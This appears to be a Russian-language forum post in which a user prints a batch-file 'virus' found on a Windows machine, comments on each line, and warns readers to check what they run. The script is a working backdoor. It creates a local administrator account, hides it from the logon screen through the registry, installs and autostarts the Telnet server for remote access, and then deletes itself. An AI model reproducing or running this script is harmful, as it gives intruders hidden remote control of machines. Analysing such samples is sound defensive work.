Вот сам "вирус":
Код: Выделить всё
1. @echo off -- отключение вывода на экран
2. chcp 866 -- изменение кодировки страницы на 866
3. net user Name Password /add -- создание учётной записи для протокола Telnet
4. net localgroup Ђ¤¬ЁЁбва в®ал Name /add -- насколько я понял, это добавление в группу администраторов
5. net accounts /maxpwage:unlimited -- строк действия учётной записи
6. reg add "HKLM\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\
SpecialAccounts\UserList" /v Name /t REG_DWORD /d 0 /f -- специальная учётная запись
7. start "" /W pkgmgr /iu: "TelnetServer" -- установка службы Telnet
8. ::tlntadmn config port=8080 sec=-NTLM --редирект на другой порт (видимо для противостояния роутерам)
9. net localgroup "TelnetClients" Name /add --добавление учётки в группу Telnet
10. sc config tlntsvr start = auto -- автозапуск
11. net start telnet -- запуск службы
12. del %0 -- самоуничтожение
И для атаки злоумышленнику нужен IP, так что думаю атака была направленной. Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.